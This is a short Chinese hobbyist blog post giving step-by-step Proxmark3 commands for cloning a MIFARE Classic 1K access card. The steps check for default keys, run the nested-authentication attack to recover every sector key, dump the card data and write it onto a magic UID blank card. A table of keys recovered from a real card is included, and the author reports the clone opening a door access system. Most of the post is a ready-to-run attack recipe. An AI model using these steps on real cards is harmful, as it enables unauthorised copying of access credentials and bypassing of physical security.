Clone IC Card with Proxmark3
好吧,今天高产似母猪。。。
安装好了 Proxmark3 的驱动,自然要玩一玩 IC 卡克隆喽。
IC Card: NXP MIFARE CLASSIC 1k | Plus 2k SL1 |
- 读取 IC 卡型号,确定与本实验相同
hf 14a read
- 使用厂家常用默认密码碰碰运气,国内好多是
ffffffffffff
, 我会乱说hf mf chk *1 ? t
参数不确定的话,使用
hf mf chk
查看,运气好的话Found valid key:[ffffffffffff]
- 利用嵌套认证漏洞,使用任何一个扇区的已知密钥,获取所有扇区的密钥(其实不懂这句话讲什么啦)
hf mf nested 1 0 a FFFFFFFFFFFF d
结果大致如下
Iterations count: 63 |---|----------------|---|----------------|---| |sec|key A |res|key B |res| |---|----------------|---|----------------|---| |000| 484558414354 | 1 | a22ae129c013 | 1 | |001| 484558414354 | 1 | 49fae4e3849f | 1 | |002| 484558414354 | 1 | 38fcf33072e0 | 1 | |003| 484558414354 | 1 | 000000000000 | 0 | |004| 484558414354 | 1 | 509359f131b1 | 1 | |005| 484558414354 | 1 | 6c78928e1317 | 1 | |006| 484558414354 | 1 | aa0720018738 | 1 | |007| 484558414354 | 1 | a6cac2886412 | 1 | |008| 484558414354 | 1 | 62d0c424ed8e | 1 | |009| 484558414354 | 1 | e64a986a5d94 | 1 | |010| 484558414354 | 1 | 8fa1d601d0a2 | 1 | |011| 484558414354 | 1 | 89347350bd36 | 1 | |012| 484558414354 | 1 | 66d2b7dc39ef | 1 | |013| 484558414354 | 1 | 6bc1e1ae547d | 1 | |014| 484558414354 | 1 | 22729a9bd40f | 1 | |015| 484558414354 | 1 | 484558414354 | 1 | |---|----------------|---|----------------|---| Printing keys to binary file dumpkeys.bin...
res 为
1
的话,表示密码正确,0
不正确,“一般 B 密码不正确不影响读取数据,可以忽视” - dump 数据到本地 dumpdata.bin 文件
hf mf dump
该文件在之前运行 proxmark3 的
proxmark3/client/
目录下, 被克隆的卡现在可以移除了 - 把 dumpdata.bin 转换成可以刷人其他 IC 卡的 eml 文件,该文件以卡号命名,即 [八个16进制字符的卡号].eml
script run dumptoemul.lua
生成的 eml 文件同样在
proxmark3/client/
目录下 - 把准备用来克隆的空白卡放在高频卡读卡位置换上,本实验使用俗称 M1 UID 的卡
hf mf cload [被克隆卡的八个16进制字符的卡号]
如果出现
Loaded from file: [八个16进制字符的卡号].eml
说明克隆成功!
得瑟地马上去试了一下门禁,完全没有问题。